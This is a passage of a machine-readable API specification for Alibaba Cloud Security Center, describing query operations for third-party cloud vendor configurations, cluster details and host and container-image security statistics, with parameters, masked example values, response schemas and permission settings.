'{\\"vendors\\":[{\\"vendorType\\":100,\\"vendor\\":\\"CHAITIN\\",\\"displayName\\":\\"Chaitin\\",\\"products\\":[{\\"product\\":\\"webFirewall\\",\\"displayName\\":\\"WAF\\",\\"backendConfig\\":{\\"apiParams\\":{\\"SecretKey\\":{\\"field\\":\\"apiToken\\",\\"format\\":\\"text\\"},\\"SecretId\\":{\\"field\\":\\"endpoint\\",\\"format\\":\\"text\\"},\\"Vendor\\":{\\"field\\":\\"vendor\\",\\"format\\":\\"text\\"},\\"CtdrCloudUserId\\":{\\"field\\":\\"ctdrCloudUserId\\",\\"format\\":\\"text\\"},\\"ExtendInfo\\":{\\"format\\":\\"json\\",\\"fields\\":[\\"product\\",\\"remark\\"]}}},\\"description\\":\\"https://docs.waf-ce.chaitin.cn/%E6%9B%B4%E5%A4%9A%E6%8A%80%E6%9C%AF%E6%96%87%E6%A1%A3/OPENAPI\\",\\"fields\\":[{\\"displayName\\":\\"Endpoint\\",\\"fieldType\\":\\"text\\",\\"prompt\\":\\"Enter an endpoint that is in the IP address:Port number format.\\",\\"required\\":true,\\"fieldId\\":\\"endpoint\\"},{\\"displayName\\":\\"API Token\\",\\"fieldType\\":\\"password\\",\\"required\\":true,\\"fieldId\\":\\"apiToken\\"},{\\"displayName\\":\\"‌Device Name‌ (The cloud_user_id field in the device connection logs will uniquely identify the device)\\",\\"fieldType\\":\\"text\\",\\"required\\":true,\\"fieldId\\":\\"ctdrCloudUserId\\"},{\\"displayName\\":\\"Remark\\",\\"fieldType\\":\\"text\\",\\"required\\":false,\\"fieldId\\":\\"remark\\"}]}]}]}', 'title' => ''], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D6288446****\\",\\n \\"Data\\": \\"{\\\\\\\\\\\\\\"vendors\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"vendorType\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"vendor\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"CHAITIN\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Chaitin\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"products\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"product\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"webFirewall\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"WAF\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"backendConfig\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"apiParams\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"SecretKey\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"field\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"apiToken\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"SecretId\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"field\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"endpoint\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"Vendor\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"field\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"vendor\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"CtdrCloudUserId\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"field\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"ctdrCloudUserId\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\"},\\\\\\\\\\\\\\"ExtendInfo\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"format\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"json\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fields\\\\\\\\\\\\\\":[\\\\\\\\\\\\\\"product\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"remark\\\\\\\\\\\\\\"]}}},\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"https://docs.waf-ce.chaitin.cn/%E6%9B%B4%E5%A4%9A%E6%8A%80%E6%9C%AF%E6%96%87%E6%A1%A3/OPENAPI\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fields\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Endpoint\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fieldType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"prompt\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Enter an endpoint that is in the IP address:Port number format.\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"required\\\\\\\\\\\\\\":true,\\\\\\\\\\\\\\"fieldId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"endpoint\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"API Token\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fieldType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"password\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"required\\\\\\\\\\\\\\":true,\\\\\\\\\\\\\\"fieldId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"apiToken\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"‌Device Name‌ (The cloud_user_id field in the device connection logs will uniquely identify the device)\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fieldType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"required\\\\\\\\\\\\\\":true,\\\\\\\\\\\\\\"fieldId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"ctdrCloudUserId\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"displayName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Remark\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fieldType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"text\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"required\\\\\\\\\\\\\\":false,\\\\\\\\\\\\\\"fieldId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"remark\\\\\\\\\\\\\\"}]}]}]}\\"\\n}","type":"json"}]', 'title' => 'Query Agentic SOC Supported Cloud Vendor Product Access Template Configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorProductTemplateConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCloudVendorProductTemplateConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeCloudVendorTrialConfig' => [ 'summary' => 'Query the trail configuration attributes of the corresponding AK configuration', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '201842', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AuthId', 'in' => 'query', 'schema' => ['description' => 'Unique ID of the AK.'."\n" ."\n" .'> You can call [DescribeCloudVendorAccountAKList](~~DescribeCloudVendorAccountAKList~~) to get the AuthId.'."\n" .'> -', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'exclusiveMinimum' => false, 'example' => '23**', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor. Values:'."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **AWS**: Amazon Web Services', 'type' => 'string', 'required' => true, 'example' => 'AWS', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The structure of the returned message.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '43313389-DED8-5BB7-8CB9-F22CDEB7****'], 'Data' => [ 'description' => 'Returned data.', 'type' => 'object', 'properties' => [ 'AuthInfo' => ['description' => 'Multi-cloud configuration information:'."\n" .'- *AWS*: Output parameters sqsQueueName, sqsRegion'."\n" .'- *Tencent*: Output parameters kafkaUserName, kafkaBootstrapServers, kafkaTopic', 'type' => 'string', 'example' => '{\\"sqsRegion\\":\\"us-west-2\\",\\"sqsQueueName\\":\\"****\\"}', 'title' => ''], 'Status' => ['description' => 'The access status of the Trail configuration. Values:'."\n" .'- **init**: Initialization in progress'."\n" .'- **verify**: Configuration verification in progress'."\n" .'- **enable**: Configuration enabled'."\n" .'- **disable**: Configuration disabled'."\n" .'- **error**: Configuration access error'."\n" .'- **timeout**: Configuration access timeout', 'type' => 'string', 'example' => 'init', 'title' => ''], 'Message' => ['description' => 'Error message returned when connection fails.', 'type' => 'string', 'example' => 'No relevant queue found', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"43313389-DED8-5BB7-8CB9-F22CDEB7****\\",\\n \\"Data\\": {\\n \\"AuthInfo\\": \\"{\\\\\\\\\\\\\\"sqsRegion\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"us-west-2\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"sqsQueueName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"****\\\\\\\\\\\\\\"}\\",\\n \\"Status\\": \\"init\\",\\n \\"Message\\": \\"No relevant queue found\\"\\n }\\n}","type":"json"}]', 'title' => 'Query Third-Party Cloud Asset Audit Log Access Configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorTrialConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:describeCloudVendorTrialConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'translator' => 'machine', ], 'DescribeClusterBasicInfo' => [ 'summary' => 'Queries cluster information by cluster ID.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster that you want to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'c870ec78ecbcb41d2a35c679823ef****', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The configuration type. Valid values:'."\n" .'- **containerNetwork**: container network topology switch'."\n" .'- **interceptionSwitch**: cluster microsegmentation switch.', 'type' => 'string', 'required' => true, 'example' => 'containerNetwork', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The operation dimension of the target switch configuration. Valid values:'."\n" .'- **Cluster**: cluster ID.', 'type' => 'string', 'required' => true, 'example' => 'Cluster', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'ClusterInfo' => [ 'description' => 'The cluster details.', 'type' => 'object', 'properties' => [ 'InstanceCount' => ['description' => 'The number of instances in the cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ClusterType' => ['description' => 'The cluster type. Valid values:'."\n" ."\n" .'- **ManagedKubernetes**: managed Kubernetes'."\n" .'- **NotManagedKubernetes**: non-managed Kubernetes'."\n" .'- **PrivateKubernetes**: private cluster'."\n" .'- **kubernetes**: dedicated Kubernetes'."\n" .'- **ask**: dedicated ASK.', 'type' => 'string', 'example' => 'kubernetes', 'title' => ''], 'State' => ['description' => 'The availability status. Valid values:'."\n" ."\n" .'- **unavailable**: Not available.'."\n" .'- **Available**: Available.'."\n" .'- **Creating**: Being created.'."\n" .'- **CreateFailed**: Creation failed.', 'type' => 'string', 'example' => 'Available', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when the cluster was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1662038134000', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'testackpro', 'title' => ''], 'CurrentVersion' => ['description' => 'The version information of the cluster.', 'type' => 'string', 'example' => '1.22.10-aliyun.1', 'title' => ''], 'TargetResult' => ['description' => 'The cluster switch status.'."\n" ."\n" .'- **true**: enabled'."\n" .'- **false**: disabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cluster.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c870ec78ecbcb41d2a35c679823ef****'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cluster information by cluster ID', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterBasicInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterBasicInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"ClusterInfo\\": {\\n \\"InstanceCount\\": 10,\\n \\"ClusterType\\": \\"kubernetes\\",\\n \\"State\\": \\"Available\\",\\n \\"CreateTime\\": 1662038134000,\\n \\"ClusterName\\": \\"testackpro\\",\\n \\"CurrentVersion\\": \\"1.22.10-aliyun.1\\",\\n \\"TargetResult\\": true,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"ClusterId\\": \\"c870ec78ecbcb41d2a35c679823ef****\\\\n\\"\\n }\\n}","type":"json"}]', ], 'DescribeClusterHostSecuritySummary' => [ 'summary' => 'Queries the security statistics of a host.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '222.71.XXX.XXX', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'required' => false, 'example' => 'c3aaf6c8085f84791882eef200cd2****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The container search field. Valid values:'."\n" ."\n" .'- **instanceId**: instance ID.'."\n" .'- **appName**: application name.'."\n" .'- **clusterId**: cluster ID.'."\n" .'- **regionId**: region.'."\n" .'- **nodeName**: node name.'."\n" .'- **namespace**: namespace.'."\n" .'- **clusterName**: cluster name.'."\n" .'- **image**: image name.'."\n" .'- **imageRepoName**: image repository name.'."\n" .'- **imageRepoNamespace**: image repository namespace.'."\n" .'- **imageRepoTag**: image tag.'."\n" .'- **imageDigest**: image digest.', 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the container search field.', 'type' => 'string', 'required' => false, 'example' => 'c1fdb5fd8d42e425d88fd73eec7be****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The query type. Valid values:'."\n" ."\n" .'- **containerId**: container ID.'."\n" .'- **uuid**: asset ID.', 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], 'ClusterHostEvent' => [ 'description' => 'The host alert details.', 'type' => 'object', 'properties' => [ 'AlarmEvent' => [ 'description' => 'The host alert details.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The warning level. Valid values:'."\n" .'- **serious**: urgent.'."\n" .'- **suspicious**: suspicious.'."\n" .'- **remind**: reminder.', 'type' => 'string', 'example' => 'remind', 'title' => ''], 'Count' => ['description' => 'The number of alerts.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VulEvent' => [ 'description' => 'The host vulnerability details.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The warning level. Valid values:'."\n" .'- **asap**: high. Fix the vulnerability at the earliest opportunity.'."\n" .'- **nntf**: medium. The vulnerability can be temporarily left unfixed.'."\n" .'- **later**: low. The vulnerability can be left unfixed.', 'type' => 'string', 'example' => 'later', 'title' => ''], 'Count' => ['description' => 'The number of vulnerabilities.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'BaselineEvent' => [ 'description' => 'The host baseline details.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The baseline risk level. Valid values:'."\n" .'- **high**: high risk.'."\n" .'- **medium**: medium risk.'."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Count' => ['description' => 'The number of baselines.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query host security statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterHostSecuritySummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterHostSecuritySummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"ClusterHostEvent\\": {\\n \\"AlarmEvent\\": [\\n {\\n \\"RiskLevel\\": \\"remind\\",\\n \\"Count\\": 1\\n }\\n ],\\n \\"VulEvent\\": [\\n {\\n \\"RiskLevel\\": \\"later\\",\\n \\"Count\\": 3\\n }\\n ],\\n \\"BaselineEvent\\": [\\n {\\n \\"RiskLevel\\": \\"medium\\",\\n \\"Count\\": 1\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeClusterImageSecuritySummary' => [ 'summary' => 'Queries the security statistics of container images.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '60.190.XXX.XXX', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.', 'type' => 'string', 'required' => false, 'example' => 'c3aaf6c8085f84791882eef200cd2****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The container search field. Valid values:'."\n" ."\n" .'- **instanceId**: container instance ID'."\n" .'- **clusterId**: cluster ID'."\n" .'- **regionId**: container region'."\n" .'- **clusterName**: cluster name'."\n" .'- **image**: image name'."\n" .'- **imageRepoName**: image repository name'."\n" .'- **imageRepoNamespace**: image repository namespace'."\n" .'- **imageRepoTag**: image repository tag'."\n" .'- **imageDigest**: image digest'."\n" .'- **clusterType**: cluster type'."\n" .'- **hostIp**: public IP address'."\n" .'- **pod**: pod'."\n" .'- **podIp**: pod IP address'."\n" .'- **containerId**: container ID'."\n" .'- **vulStatus**: whether the container has vulnerabilities'."\n" .'- **alarmStatus**: whether the container has security alerts'."\n" .'- **riskStatus**: whether the container has risks'."\n" .'- **riskLevel**: container risk level'."\n" .'- **containerScope**: container type.', 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the container search field.', 'type' => 'string', 'required' => false, 'example' => 'c2ac28b2d0c734df29a21d29f18ac****', 'title' => ''], ], [ 'name' => 'ImageRepoName', 'in' => 'query', 'schema' => ['description' => 'The image repository name.', 'type' => 'string', 'required' => false, 'example' => 'repo', 'title' => ''], ], [ 'name' => 'ImageRepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The image repository namespace.', 'type' => 'string', 'required' => false, 'example' => 'namespace', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The image tag.', 'type' => 'string', 'required' => false, 'example' => '3.54.0.1', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The image digest.', 'type' => 'string', 'required' => false, 'example' => '402902de6480a020b9f29e7105e77b8a218bc1cccbc3935d3b38c8ea9ba2****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'ClusterImageEvent' => [ 'description' => 'The image security event information.', 'type' => 'object', 'properties' => [ 'ImageCveVul' => [ 'description' => 'The image system vulnerability information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The warning level. Valid values:'."\n" ."\n" .'- **asap**: High. Fix the vulnerability at the earliest opportunity.'."\n" .'- **nntf**: Medium. The vulnerability can be temporarily left unfixed.'."\n" .'- **later**: Low. The vulnerability can be left unfixed.', 'type' => 'string', 'example' => 'later', 'title' => ''], 'Count' => ['description' => 'The number of vulnerabilities.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ImageMaliciousFile' => [ 'description' => 'The image malicious sample information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Count' => ['description' => 'The number of malicious samples.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ImageScaVul' => [ 'description' => 'The image application vulnerability information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The warning level. Valid values:'."\n" ."\n" .'- **asap**: High. Fix the vulnerability at the earliest opportunity.'."\n" .'- **nntf**: Medium. The vulnerability can be temporarily left unfixed.'."\n" .'- **later**: Low. The vulnerability can be left unfixed.', 'type' => 'string', 'example' => 'later', 'title' => ''], 'Count' => ['description' => 'The number of application vulnerabilities.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ImageBaseline' => [ 'description' => 'The image baseline check information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Count' => ['description' => 'The number of baselines.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image security statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterImageSecuritySummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterImageSecuritySummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"ClusterImageEvent\\": {\\n \\"ImageCveVul\\": [\\n {\\n \\"RiskLevel\\": \\"later\\",\\n \\"Count\\": 0\\n }\\n ],\\n \\"ImageMaliciousFile\\": [\\n {\\n \\"RiskLevel\\": \\"medium\\",\\n \\"Count\\": 0\\n }\\n ],\\n \\"ImageScaVul\\": [\\n {\\n \\"RiskLevel\\": \\"later\\",\\n \\"Count\\": 0\\n }\\n ],\\n \\"ImageBaseline\\": [\\n {\\n \\"RiskLevel\\": \\"medium\\",\\n \\"Count\\": 0\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeClusterInfoList' => [ 'summary' => 'Queries the information about a cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the feature. Valid values:'."\n" ."\n" .'* **containerNetwork**: container network'."\n" .'* **interceptionSwitch**: cluster microsegmentation'."\n", 'type' => 'string', 'required' => true, 'example' => 'containerNetwork', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The dimension based on which you want to configure the feature. Valid values:'."\n" ."\n" .'* **Cluster**: the ID of the cluster'."\n", 'type' => 'string', 'required' => true, 'example' => 'Cluster', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The operation value. The value specifies the ID of the cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c23551de6149343e8a54e69fbefe6****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 